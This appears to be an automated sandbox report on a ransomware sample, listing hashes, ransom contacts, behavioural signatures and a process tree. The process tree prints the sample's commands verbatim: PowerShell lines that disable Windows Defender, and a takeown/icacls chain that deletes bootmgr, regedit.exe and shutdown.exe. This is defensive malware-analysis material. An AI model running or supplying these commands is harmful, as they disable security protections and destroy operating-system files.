Analysis
-
max time kernel
1141s -
max time network
1560s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
25-10-2021 07:50
Static task
static1
Behavioral task
behavioral1
Sample
b53415f6_lcvDB3iF4J.exe
Resource
win7-en-20210920
General
-
Target
b53415f6_lcvDB3iF4J.exe
-
Size
7.4MB
-
MD5
b53415f6d38ce4831cbf327daf5201b4
-
SHA1
778d6f976e10d201903c76adcd18f14e685a3704
-
SHA256
4efcc256493c1c7d8f695bee676beab4aaf3d3d1e1847cf8462c38af1107b7b8
-
SHA512
0c2e2fd8ebfe175dc844d64ad9e85f8ab23f8e63b75d7773a38bf68741071c0ea6aa91402b1ab5813a7d66b289650b1e868c56dd86636dcc26c37c07bdb55bb4
Malware Config
Extracted
C:\Users\Admin\Desktop\DECRYPT-FILES.TXT
CobraLocker@mail2tor.com
f64dfn9pbhybaqfrh5dp65jrzcg@protonmail.com
http://mail2tor2zyjdctd.onion/
Signatures
-
Maze
Ransomware family also known as ChaCha.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Disables Task Manager via registry modification
-
Executes dropped EXE 1 IoCs
Processes:
VSSVC.exepid process 3772 VSSVC.exe -
Modifies extensions of user files 3 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
VSSVC.exedescription ioc process File renamed C:\Users\Admin\Pictures\SetRename.png => C:\Users\Admin\Pictures\SetRename.png.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe VSSVC.exe File renamed C:\Users\Admin\Pictures\UnlockUnregister.png => C:\Users\Admin\Pictures\UnlockUnregister.png.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe VSSVC.exe File renamed C:\Users\Admin\Pictures\WriteRevoke.crw => C:\Users\Admin\Pictures\WriteRevoke.crw.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe VSSVC.exe -
Possible privilege escalation attempt 5 IoCs
Processes:
takeown.exeicacls.exetakeown.exetakeown.exeicacls.exepid process 2348 takeown.exe 3980 icacls.exe 1372 takeown.exe 1300 takeown.exe 1204 icacls.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
b53415f6_lcvDB3iF4J.exeVSSVC.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b53415f6_lcvDB3iF4J.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b53415f6_lcvDB3iF4J.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion VSSVC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion VSSVC.exe -
Modifies file permissions 1 TTPs 5 IoCs
Processes:
icacls.exetakeown.exeicacls.exetakeown.exetakeown.exepid process 1204 icacls.exe 2348 takeown.exe 3980 icacls.exe 1372 takeown.exe 1300 takeown.exe -
Processes:
resource yara_rule behavioral2/memory/3672-118-0x0000000000B70000-0x0000000000B71000-memory.dmp themida C:\Users\Admin\AppData\Local\Temp\VSSVC.exe themida C:\Users\Admin\AppData\Local\Temp\VSSVC.exe themida behavioral2/memory/3772-166-0x0000000000B20000-0x0000000000B21000-memory.dmp themida -
Processes:
b53415f6_lcvDB3iF4J.exeVSSVC.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA b53415f6_lcvDB3iF4J.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA VSSVC.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
b53415f6_lcvDB3iF4J.exeVSSVC.exepid process 3672 b53415f6_lcvDB3iF4J.exe 3772 VSSVC.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 1052 powershell.exe 648 powershell.exe 1996 powershell.exe 652 powershell.exe 1052 powershell.exe 648 powershell.exe 1996 powershell.exe 652 powershell.exe 1052 powershell.exe 648 powershell.exe 1996 powershell.exe 652 powershell.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
Processes:
b53415f6_lcvDB3iF4J.exepowershell.exepowershell.exepowershell.exepowershell.exeVSSVC.exetakeown.exetakeown.exetakeown.exedescription pid process Token: SeDebugPrivilege 3672 b53415f6_lcvDB3iF4J.exe Token: SeDebugPrivilege 3672 b53415f6_lcvDB3iF4J.exe Token: SeDebugPrivilege 652 powershell.exe Token: SeDebugPrivilege 648 powershell.exe Token: SeDebugPrivilege 1996 powershell.exe Token: SeDebugPrivilege 1052 powershell.exe Token: SeDebugPrivilege 3772 VSSVC.exe Token: SeDebugPrivilege 3772 VSSVC.exe Token: SeTakeOwnershipPrivilege 1300 takeown.exe Token: SeTakeOwnershipPrivilege 2348 takeown.exe Token: SeTakeOwnershipPrivilege 1372 takeown.exe -
Suspicious use of WriteProcessMemory 33 IoCs
Processes:
b53415f6_lcvDB3iF4J.exeVSSVC.execmd.exedescription pid process target process PID 3672 wrote to memory of 648 3672 b53415f6_lcvDB3iF4J.exe powershell.exe PID 3672 wrote to memory of 648 3672 b53415f6_lcvDB3iF4J.exe powershell.exe PID 3672 wrote to memory of 648 3672 b53415f6_lcvDB3iF4J.exe powershell.exe PID 3672 wrote to memory of 652 3672 b53415f6_lcvDB3iF4J.exe powershell.exe PID 3672 wrote to memory of 652 3672 b53415f6_lcvDB3iF4J.exe powershell.exe PID 3672 wrote to memory of 652 3672 b53415f6_lcvDB3iF4J.exe powershell.exe PID 3672 wrote to memory of 1052 3672 b53415f6_lcvDB3iF4J.exe powershell.exe PID 3672 wrote to memory of 1052 3672 b53415f6_lcvDB3iF4J.exe powershell.exe PID 3672 wrote to memory of 1052 3672 b53415f6_lcvDB3iF4J.exe powershell.exe PID 3672 wrote to memory of 1996 3672 b53415f6_lcvDB3iF4J.exe powershell.exe PID 3672 wrote to memory of 1996 3672 b53415f6_lcvDB3iF4J.exe powershell.exe PID 3672 wrote to memory of 1996 3672 b53415f6_lcvDB3iF4J.exe powershell.exe PID 3672 wrote to memory of 3772 3672 b53415f6_lcvDB3iF4J.exe VSSVC.exe PID 3672 wrote to memory of 3772 3672 b53415f6_lcvDB3iF4J.exe VSSVC.exe PID 3672 wrote to memory of 3772 3672 b53415f6_lcvDB3iF4J.exe VSSVC.exe PID 3772 wrote to memory of 1628 3772 VSSVC.exe cmd.exe PID 3772 wrote to memory of 1628 3772 VSSVC.exe cmd.exe PID 3772 wrote to memory of 1628 3772 VSSVC.exe cmd.exe PID 1628 wrote to memory of 1300 1628 cmd.exe takeown.exe PID 1628 wrote to memory of 1300 1628 cmd.exe takeown.exe PID 1628 wrote to memory of 1300 1628 cmd.exe takeown.exe PID 1628 wrote to memory of 1204 1628 cmd.exe icacls.exe PID 1628 wrote to memory of 1204 1628 cmd.exe icacls.exe PID 1628 wrote to memory of 1204 1628 cmd.exe icacls.exe PID 1628 wrote to memory of 2348 1628 cmd.exe takeown.exe PID 1628 wrote to memory of 2348 1628 cmd.exe takeown.exe PID 1628 wrote to memory of 2348 1628 cmd.exe takeown.exe PID 1628 wrote to memory of 3980 1628 cmd.exe icacls.exe PID 1628 wrote to memory of 3980 1628 cmd.exe icacls.exe PID 1628 wrote to memory of 3980 1628 cmd.exe icacls.exe PID 1628 wrote to memory of 1372 1628 cmd.exe takeown.exe PID 1628 wrote to memory of 1372 1628 cmd.exe takeown.exe PID 1628 wrote to memory of 1372 1628 cmd.exe takeown.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\b53415f6_lcvDB3iF4J.exe"C:\Users\Admin\AppData\Local\Temp\b53415f6_lcvDB3iF4J.exe"1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent NeverSend2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting Disable2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\VSSVC.exe"C:\Users\Admin\AppData\Local\Temp\VSSVC.exe"2⤵
- Executes dropped EXE
- Modifies extensions of user files
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant %username%:F && del C:\Windows\regedit.exe && takeown /f C:\Windows\System32\shutdown.exe && icacls C:\Windows\System32\shutdown.exe /grant %username%:F && del C:\Windows\System32\shutdown.exe && Exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System324⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\System32 /grant Admin:F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\drivers4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\System32\drivers /grant Admin:F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\LogonUI.exe4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\DECRYPT-FILES.TXT1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logMD5
c558fdaa3884f969f1ec904ae7bbd991
SHA1b4f85d04f6bf061a17f52c264c065b786cfd33ff
SHA2563e2559b6ca355d011b05b1fcf35ed8b2375586fe6bb01bc367f24eb8ac82975e
SHA5126523c778fd9fab0085fafe7b4049e591403865212cc25109cb11f11584c7258bc15e0a5524d089d0f662151b22f3f8e6f871091cec57064c69a9a95903f9e7d4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
6faff0ebd7c3554b8b1b66bdc7a8ed7f
SHA1cc38cfcd0b4265eb2200f105c9ae46b3809beb72
SHA256b5cf2e1865f49c705491963f07bbf48cd3a863e42e73c7f84b99e3edca282c3a
SHA512ab424cc9603699a5285b75527892cd20ca3209cc01c4191171e7463d149434bd877c5b2a34443bc44e7502b58e35e2ecafd56bfef8f5d496e2aea2037f7b439d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
6faff0ebd7c3554b8b1b66bdc7a8ed7f
SHA1cc38cfcd0b4265eb2200f105c9ae46b3809beb72
SHA256b5cf2e1865f49c705491963f07bbf48cd3a863e42e73c7f84b99e3edca282c3a
SHA512ab424cc9603699a5285b75527892cd20ca3209cc01c4191171e7463d149434bd877c5b2a34443bc44e7502b58e35e2ecafd56bfef8f5d496e2aea2037f7b439d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
114f5f5d2081fca006ea64c5422febcc
SHA18e7d221f7e7be16045b4bbbd38d5a960fe49709f
SHA2564b480ae1cf82779050dd48bba083e859ed2286e45d6200fb806e4c272f68a976
SHA512fe60c50701b786ca7b2b3d97bfaaa0f3d93419e5a85a97ba8f59eb993338acad478681ce12efe117d60a0294a5cf96eebdece83db04c65aebdad7015b84fd90e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
114f5f5d2081fca006ea64c5422febcc
SHA18e7d221f7e7be16045b4bbbd38d5a960fe49709f
SHA2564b480ae1cf82779050dd48bba083e859ed2286e45d6200fb806e4c272f68a976
SHA512fe60c50701b786ca7b2b3d97bfaaa0f3d93419e5a85a97ba8f59eb993338acad478681ce12efe117d60a0294a5cf96eebdece83db04c65aebdad7015b84fd90e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
114f5f5d2081fca006ea64c5422febcc
SHA18e7d221f7e7be16045b4bbbd38d5a960fe49709f
SHA2564b480ae1cf82779050dd48bba083e859ed2286e45d6200fb806e4c272f68a976
SHA512fe60c50701b786ca7b2b3d97bfaaa0f3d93419e5a85a97ba8f59eb993338acad478681ce12efe117d60a0294a5cf96eebdece83db04c65aebdad7015b84fd90e
-
C:\Users\Admin\AppData\Local\Temp\VSSVC.exeMD5
e4f24d91d8e7290ffd6afc8aa01c6d63
SHA1b552c6af33cc5a62379028687924406cba8ff74d
SHA2565eb371a9cf91b981502d3ee26880b8c15f62b3eeaaa2484d523a2a03a233bebb
SHA512ae0d0c2494b0a4753039f4fdf6a589848a44a386b759511aab9374e9446f84c39895ec2c9d00ed0ce3df07663a9f14e2f21f42a85966336b0e35204da0d82e00
-
C:\Users\Admin\AppData\Local\Temp\VSSVC.exeMD5
e4f24d91d8e7290ffd6afc8aa01c6d63
SHA1b552c6af33cc5a62379028687924406cba8ff74d
SHA2565eb371a9cf91b981502d3ee26880b8c15f62b3eeaaa2484d523a2a03a233bebb
SHA512ae0d0c2494b0a4753039f4fdf6a589848a44a386b759511aab9374e9446f84c39895ec2c9d00ed0ce3df07663a9f14e2f21f42a85966336b0e35204da0d82e00
-
C:\Users\Admin\Desktop\DECRYPT-FILES.TXTMD5
8f6a1f1586c647b68aad35ce0f8dd416
SHA143a1727b987a2f66e7a9589c2ddac52030ca259b
SHA256452727c78872048a0a2a8ebd2c8ea1246f1c959c521cc7f45d99956a67c1325f
SHA51213bf3adbfd4deb3f60be04bf0fc87c56e483764e6806a072ec339cb48a080eab7d2f84439a0e2498f1c82231f8afae08de46253c79ee4ec3dcaec9c370e632ac
-
memory/648-132-0x0000000003440000-0x0000000003441000-memory.dmpFilesize
4KB
-
memory/648-238-0x000000007EA20000-0x000000007EA21000-memory.dmpFilesize
4KB
-
memory/648-128-0x0000000003440000-0x0000000003441000-memory.dmpFilesize
4KB
-
memory/648-124-0x0000000000000000-mapping.dmp
-
memory/648-194-0x0000000003440000-0x0000000003441000-memory.dmpFilesize
4KB
-
memory/648-181-0x00000000088D0000-0x00000000088D1000-memory.dmpFilesize
4KB
-
memory/648-179-0x0000000007F90000-0x0000000007F91000-memory.dmpFilesize
4KB
-
memory/648-266-0x00000000072A3000-0x00000000072A4000-memory.dmpFilesize
4KB
-
memory/648-164-0x00000000072A2000-0x00000000072A3000-memory.dmpFilesize
4KB
-
memory/648-151-0x00000000072A0000-0x00000000072A1000-memory.dmpFilesize
4KB
-
memory/652-246-0x000000007F040000-0x000000007F041000-memory.dmpFilesize
4KB
-
memory/652-137-0x0000000004D00000-0x0000000004D01000-memory.dmpFilesize
4KB
-
memory/652-125-0x0000000000000000-mapping.dmp
-
memory/652-143-0x0000000007880000-0x0000000007881000-memory.dmpFilesize
4KB
-
memory/652-272-0x0000000007243000-0x0000000007244000-memory.dmpFilesize
4KB
-
memory/652-148-0x0000000007240000-0x0000000007241000-memory.dmpFilesize
4KB
-
memory/652-129-0x0000000004C00000-0x0000000004C01000-memory.dmpFilesize
4KB
-
memory/652-153-0x0000000007242000-0x0000000007243000-memory.dmpFilesize
4KB
-
memory/652-198-0x0000000004C00000-0x0000000004C01000-memory.dmpFilesize
4KB
-
memory/652-131-0x0000000004C00000-0x0000000004C01000-memory.dmpFilesize
4KB
-
memory/1052-152-0x00000000077C0000-0x00000000077C1000-memory.dmpFilesize
4KB
-
memory/1052-155-0x0000000007910000-0x0000000007911000-memory.dmpFilesize
4KB
-
memory/1052-126-0x0000000000000000-mapping.dmp
-
memory/1052-138-0x00000000044B0000-0x00000000044B1000-memory.dmpFilesize
4KB
-
memory/1052-147-0x0000000007020000-0x0000000007021000-memory.dmpFilesize
4KB
-
memory/1052-165-0x0000000006AE2000-0x0000000006AE3000-memory.dmpFilesize
4KB
-
memory/1052-267-0x0000000006AE3000-0x0000000006AE4000-memory.dmpFilesize
4KB
-
memory/1052-149-0x0000000007750000-0x0000000007751000-memory.dmpFilesize
4KB
-
memory/1052-159-0x0000000006AE0000-0x0000000006AE1000-memory.dmpFilesize
4KB
-
memory/1052-133-0x00000000044B0000-0x00000000044B1000-memory.dmpFilesize
4KB
-
memory/1052-242-0x000000007F4A0000-0x000000007F4A1000-memory.dmpFilesize
4KB
-
memory/1052-188-0x0000000008120000-0x0000000008121000-memory.dmpFilesize
4KB
-
memory/1052-192-0x00000000044B0000-0x00000000044B1000-memory.dmpFilesize
4KB
-
memory/1204-915-0x0000000000000000-mapping.dmp
-
memory/1300-914-0x0000000000000000-mapping.dmp
-
memory/1372-918-0x0000000000000000-mapping.dmp
-
memory/1628-913-0x0000000000000000-mapping.dmp
-
memory/1996-162-0x0000000006F40000-0x0000000006F41000-memory.dmpFilesize
4KB
-
memory/1996-196-0x00000000047E0000-0x00000000047E1000-memory.dmpFilesize
4KB
-
memory/1996-127-0x0000000000000000-mapping.dmp
-
memory/1996-167-0x0000000006F42000-0x0000000006F43000-memory.dmpFilesize
4KB
-
memory/1996-469-0x0000000006F43000-0x0000000006F44000-memory.dmpFilesize
4KB
-
memory/1996-134-0x00000000047E0000-0x00000000047E1000-memory.dmpFilesize
4KB
-
memory/1996-139-0x00000000047E0000-0x00000000047E1000-memory.dmpFilesize
4KB
-
memory/2348-916-0x0000000000000000-mapping.dmp
-
memory/3672-123-0x0000000005D20000-0x000000000621E000-memory.dmpFilesize
5.0MB
-
memory/3672-122-0x0000000005CE0000-0x0000000005CE1000-memory.dmpFilesize
4KB
-
memory/3672-121-0x0000000005C30000-0x0000000005C31000-memory.dmpFilesize
4KB
-
memory/3672-120-0x0000000006220000-0x0000000006221000-memory.dmpFilesize
4KB
-
memory/3672-117-0x0000000077C10000-0x0000000077D9E000-memory.dmpFilesize
1.6MB
-
memory/3672-118-0x0000000000B70000-0x0000000000B71000-memory.dmpFilesize
4KB
-
memory/3772-156-0x0000000077C10000-0x0000000077D9E000-memory.dmpFilesize
1.6MB
-
memory/3772-130-0x0000000000000000-mapping.dmp
-
memory/3772-180-0x0000000005590000-0x0000000005A8E000-memory.dmpFilesize
5.0MB
-
memory/3772-166-0x0000000000B20000-0x0000000000B21000-memory.dmpFilesize
4KB
-
memory/3980-917-0x0000000000000000-mapping.dmp